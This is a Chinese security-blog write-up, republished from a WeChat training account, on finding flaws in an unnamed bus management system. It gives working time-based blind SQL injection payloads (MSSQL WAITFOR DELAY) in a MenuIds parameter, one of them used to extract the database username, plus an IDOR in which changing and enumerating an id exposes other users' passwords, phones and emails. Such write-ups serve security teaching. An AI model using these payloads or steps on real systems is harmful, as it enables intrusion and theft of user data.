某公交管理系统简易逻辑漏洞+SQL注入挖掘

admin 2025年1月15日19:29:57评论12 views字数 1132阅读3分46秒阅读模式
本文由掌控安全学院 - xhys 投稿

Track安全社区投稿~  

千元稿费!还有保底奖励~(https://bbs.zkaq.cn)

某公交管理系统挖掘

SQL注入漏洞

前台通过给的账号密码,进去

按顺序依次点击1、2、3走一遍功能点,然后开启抓包点击4

某公交管理系统简易逻辑漏洞+SQL注入挖掘img

当点击上图的4步骤按钮时,会抓到图下数据包,将其转发到burp的重放模块

某公交管理系统简易逻辑漏洞+SQL注入挖掘

img

构造以下注入poc,可见注入延时了五秒,用户输入的语句成功拼接到原有的SQL语句上执行了 下面的poc是MenuIds的值

100,101,151,152,153,154,200,201,202,203,204,300,301,302,303,305,306,307,308,311,312,313,314,400,401,800,801,802,805,806,850,851,852,853,861,862,863,870,880,900,9070,9071,9080,9081,9082,9083,9084,9085,9086,9093’;WAITFOR DELAY ’0:0:5’--

某公交管理系统简易逻辑漏洞+SQL注入挖掘img

下面开始进行注入拿数据,构造下面poc,对数据库当前用户名进行查询

100,101,151,152,153,154,200,201,202,203,204,300,301,302,303,305,306,307,308,311,312,313,314,400,401,800,801,802,805,806,850,851,852,853,861,862,863,870,880,900,9070,9071,9080,9081,9082,9083,9084,9085,9086,9093’;if(ascii(substring((select user),1,1)))=116 WAITFOR DELAY ’0:0:5’--

某公交管理系统简易逻辑漏洞+SQL注入挖掘img

成功延时5秒,说明数据库当前用户名第一个字母为t,下面继续对数据库用户名第N位字母进行猜解

某公交管理系统简易逻辑漏洞+SQL注入挖掘img

后面通过注入我成功拿到当前数据库用户名

越权漏洞

某公交管理系统简易逻辑漏洞+SQL注入挖掘img

在点击上图中的编辑按钮时,开启抓包,抓到下图示数据包。

某公交管理系统简易逻辑漏洞+SQL注入挖掘img

将数据包发送到burp的重放模块,然后将id值改为1

某公交管理系统简易逻辑漏洞+SQL注入挖掘img

可以看见明文看见其他用户的账户密码、手机号、邮箱等敏感信息,我们可以利用这个信息进行登录等操作 再次将数据包转发到burp的Intruder模块,进行1-100遍历id值,可见也是将全站用户信息都可以遍历出来了,此处就只展示测试数据了。

某公交管理系统简易逻辑漏洞+SQL注入挖掘img
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

某公交管理系统简易逻辑漏洞+SQL注入挖掘

 

原文始发于微信公众号(掌控安全EDU):某公交管理系统简易逻辑漏洞+SQL注入挖掘

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月15日19:29:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某公交管理系统简易逻辑漏洞+SQL注入挖掘https://cn-sec.com/archives/3631676.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息